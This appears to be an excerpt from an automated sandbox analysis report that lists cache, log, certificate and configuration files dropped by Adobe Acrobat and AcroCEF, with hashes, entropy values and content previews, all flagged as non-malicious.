                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):476
                                                                                      Entropy (8bit):4.962905575204746
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                                                      MD5:F371FDA655516B50D489FC8CFB1306C9
                                                                                      SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                                                      SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                                                      SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):476
                                                                                      Entropy (8bit):4.962905575204746
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                                                      MD5:F371FDA655516B50D489FC8CFB1306C9
                                                                                      SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                                                      SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                                                      SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF5a52ec.TMP (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):476
                                                                                      Entropy (8bit):4.962905575204746
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                                                      MD5:F371FDA655516B50D489FC8CFB1306C9
                                                                                      SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                                                      SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                                                      SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3878
                                                                                      Entropy (8bit):5.230089927616618
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:wshFT0h7cA4YC2EVPCqY35NEmNOYcGPtqKYSEVQADc/DD:wshFT0h7cZb2EVKZPEANcGIK5EVQADc/
                                                                                      MD5:8BE2AB5E639DA6AB34A861CA75CE5388
                                                                                      SHA1:7FA1A9550EDEEC533C165D354F987CCC2A37F339
                                                                                      SHA-256:1EA624BC22E65200D86BEA8FF46F4EF5E271E9C8DCD2BCA8C528E11EE7BFFB84
                                                                                      SHA-512:DFA3AF4FAB5336C3BF673E4FF3BFEAF8F8560783DE83B8C3322B90B41E12E24A362F6B7424C713C16D965A5000A5511B79E547568A10BD5BA34CFE0EB71EBF34
                                                                                      Malicious:false
                                                                                      Preview:*...#................version.1..namespace-#..o................next-map-id.1.Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/.0..QRr................next-map-id.2.Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/.2%e.o................next-map-id.4.Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/.3nU..^...............Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/"..C^...............Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/....a...............Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.+;|a...............Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/....o................next-map-id.5.Pnamespace-10b75d2f_11e7_4fa3_ae23_

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):322
                                                                                      Entropy (8bit):5.259000194078981
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7I1GMq2PFi2nKuAl9OmbzNMxIFUt8OI1Zmw+OIfaFkwOFi2nKuAl9OmbzNMFLJ:7I1zvdZHAa8jFUt8OI1/+OIu5wZHAa8E
                                                                                      MD5:8E28CFE8894D8EB070D9FF5B3F86B15D
                                                                                      SHA1:6DB101994F2B360AF948788816089836336794B8
                                                                                      SHA-256:2E51458F0B7A035DAC814E67161773315BC2F3380D322EC88D2D6DC89DD630AC
                                                                                      SHA-512:944C0C7B888F75217E7CC077000AD794462AC0BFA0C4AAC3328D67EF80954AB639AFDA0D9EF89530C7120D153FED5204E54003EDFA78B69D44D08FDD1D56A24B
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:45:14.987 1fc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:45:14.988 1fc4 Recovering log #3.2024/12/19-06:45:14.989 1fc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):322
                                                                                      Entropy (8bit):5.259000194078981
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7I1GMq2PFi2nKuAl9OmbzNMxIFUt8OI1Zmw+OIfaFkwOFi2nKuAl9OmbzNMFLJ:7I1zvdZHAa8jFUt8OI1/+OIu5wZHAa8E
                                                                                      MD5:8E28CFE8894D8EB070D9FF5B3F86B15D
                                                                                      SHA1:6DB101994F2B360AF948788816089836336794B8
                                                                                      SHA-256:2E51458F0B7A035DAC814E67161773315BC2F3380D322EC88D2D6DC89DD630AC
                                                                                      SHA-512:944C0C7B888F75217E7CC077000AD794462AC0BFA0C4AAC3328D67EF80954AB639AFDA0D9EF89530C7120D153FED5204E54003EDFA78B69D44D08FDD1D56A24B
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:45:14.987 1fc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:45:14.988 1fc4 Recovering log #3.2024/12/19-06:45:14.989 1fc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241219114519Z-204.bmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):65110
                                                                                      Entropy (8bit):0.6376462682686903
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                      MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                      SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                      SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                      SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                      Malicious:false
                                                                                      Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                      Category:dropped
                                                                                      Size (bytes):86016
                                                                                      Entropy (8bit):4.439063528614613
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:yejci5GSiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:0CurVgazUpUTTGt
                                                                                      MD5:30C90DFCD496D290FCB27B9ADE2BACDD
                                                                                      SHA1:E800AC38C38A70D3BCC81C1D861B521FC8FD85AD
                                                                                      SHA-256:3B823959B1331DC60DD0F9542B48DFE95B282CAC3B3335DB0DA742304CB19810
                                                                                      SHA-512:97AAD3FF301BFC6DD1A73E98BE94B436B9317D3CF86F087324218E3E2A775A565A7E8F7F1A79BD5CDE367B7B028279E65B9AE8AE6FD1029ECF8C4B01E3725D74
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite Rollback Journal
                                                                                      Category:dropped
                                                                                      Size (bytes):8720
                                                                                      Entropy (8bit):3.7765388081454168
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:7MMup/E2ioyVBFioy5oWoy1CUoy1+uKOioy1noy1AYoy1Wioy1hioybioyMqoy1D:7+pjuBFJb2XKQdIQlnb9IVXEBodRBkU
                                                                                      MD5:F3179C557A728EA05D45674DB4393753
                                                                                      SHA1:E7EB66ADBBB7CBEF7F57C6B3B57A584088CB7D3C
                                                                                      SHA-256:0376D128B8748A48940A56F0F5309E46A9E9383086C05548CED2018080B8C4D0
                                                                                      SHA-512:8DD77F414A5146D7BBB7B3DDDA151AB64EB1DA056CF85ECF97082AF0BD7C2236875644E6CBAF12B075787606B03B1F445C48C41DF83BD00E7F542888C3470137
                                                                                      Malicious:false
                                                                                      Preview:.... .c.....h=.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:Certificate, Version=3
                                                                                      Category:dropped
                                                                                      Size (bytes):1391
                                                                                      Entropy (8bit):7.705940075877404
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                      Malicious:false
                                                                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):71954
                                                                                      Entropy (8bit):7.996617769952133
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                      Malicious:false
                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):192
                                                                                      Entropy (8bit):2.756901573172974
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:kkFklgA8klfllXlE/HT8k1yhttNNX8RolJuRdxLlGB9lQRYwpDdt:kK5fT88y3NMa8RdWBwRd
                                                                                      MD5:C4744DA03453356822DED2E2FC706E4B
                                                                                      SHA1:D0DA05B98E2F93AC330F187495955CFC1177B111
                                                                                      SHA-256:66C440CC971A71358B80416BF85818837043A5D921EA82162099273F438C5973
                                                                                      SHA-512:3EB73A238ED8131C2DD1028E2E0D8F0074290A136E62ABA5BFD9AC0263297ACE95EF1D78A45B2B96C64004510853D487BE37783D81FA11B94335726291CE2E1B
                                                                                      Malicious:false
                                                                                      Preview:p...... .........e9~.R..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):3.150184159866505
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kK7i9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:DdDnLNkPlE99SNxAhUe/3
                                                                                      MD5:1400492B29CEC9207E3F9C65DB6F0B98
                                                                                      SHA1:78E064066133F8D32FC69563248BBB3F300F3B28
                                                                                      SHA-256:349B09397AD9FB23F034EF537D0627FD523C8654B7548DCF07F44102FA2312D9
                                                                                      SHA-512:86AE5F40F119D99FF2CC3B2EA8E3B262FAD461BAF577FD4CFCC6F571D9C17A66CB1FEDA0F254ACABD1953FF07D96514A5304D633BBC23814190D7DC2CFD95AAA
                                                                                      Malicious:false
                                                                                      Preview:p...... ..........g..R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.342944833692278
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJM3g98kUwPeUkwRe9:YvXKXsvyB3pUTbdFVGMbLUkee9
                                                                                      MD5:96603D350745E13E9FA8C0C178BC85A2
                                                                                      SHA1:D7365B332CEFB229B0387978E474A0DD476E8690
                                                                                      SHA-256:3F190849CF19BE991F8A86E70E3A27EB188BAB85286C1F411C636BF2717D1EEA
                                                                                      SHA-512:17DAA37300F32520E7BEA131B34DCFFEA14B745210E5D38991A6BFA049AAF5763DB26222CCA9967B0C43D502B0E465083BA33FE26D5C91C477CF6C63CFA079EA
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.277753369752202
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfBoTfXpnrPeUkwRe9:YvXKXsvyB3pUTbdFVGWTfXcUkee9
                                                                                      MD5:8A3E148F5555E35EE75796408D3DFC34
                                                                                      SHA1:4846E179646B2C0A89EB43322FF6F5258843FA8D
                                                                                      SHA-256:57E51773520D32F92D7D5EEA7AC3CD8CD9AA5DF93BF4C2F0665457A3A6E5F426
                                                                                      SHA-512:B3F898DC3DF2C4422706DC33268AF997D9B0144608F342C35C46B3AAEAF146FC133B89839CE6B2B8F258768AEAA8C06D1D480D5113716D863AEAC2EECA49655E
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.255892284497469
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfBD2G6UpnrPeUkwRe9:YvXKXsvyB3pUTbdFVGR22cUkee9
                                                                                      MD5:01D631683198251160164D56596DE038
                                                                                      SHA1:44A437BD08EAF3C5188653B034D67DAC035F93D7
                                                                                      SHA-256:F19F7590E67140182B1F85A4A6B4C1C30E20E4428A6058BE1C763D3758DBB227
                                                                                      SHA-512:E578182D8E68926D7CC896D88754B34D4C2DF8BDA4B4121F1DAB404C634485B8F1FAC5138A605C70DEA1A033B23EBB1B572341FFC52A0D058BF6C06C13AE7491
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):285
                                                                                      Entropy (8bit):5.316507103138238
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfPmwrPeUkwRe9:YvXKXsvyB3pUTbdFVGH56Ukee9
                                                                                      MD5:E21D907EC1AE0ABAF3BC90766618FCA9
                                                                                      SHA1:FCDB4BF73DDC07E9D23EA9EA8388B380DB30DD67
                                                                                      SHA-256:078E02D07EC89D30B9FF2375E6271DACAC7051129BB8F5B39B9B650A19FA04AA
                                                                                      SHA-512:458BF0CC05B5ECA938FC4E8DFF0CF58EF26FEE05B74D721D8C97A45FB53E1F18EEB836E894F2693F21CC601D2A70B1594AFDF0054566EF1ECCE715911DD9D3F6
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1123
                                                                                      Entropy (8bit):5.686188589427989
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6XvpUXn6pLgE9cQx8LennAvzBvkn0RCmK8czOCCSz:YvMwn6hgy6SAFv5Ah8cv/z
                                                                                      MD5:368B9EBA5886B5BFDEB94106C9DDCF4D
                                                                                      SHA1:9317D00138931F0D655C834E33CFC3C1E3F3391C
                                                                                      SHA-256:B81C95098941D28134A4BF1BFD1F32188D437C5635BA6B8E653A6CA052374525
                                                                                      SHA-512:FBEFE5AE2DF8A6C3787C1B030D23F2C662D348CE7EFF0F45E54C15DF13B0C178F105290E97D670A407C54C49EB6CB1804DFA5D30B8C2DE5D495476FC1B000ABF
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.255308902577808
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJf8dPeUkwRe9:YvXKXsvyB3pUTbdFVGU8Ukee9
                                                                                      MD5:3AB4DC7FDE8055E0A5648010ED64188E
                                                                                      SHA1:AEA85AE0BA73C9B3B7C810A283C2C49387630850
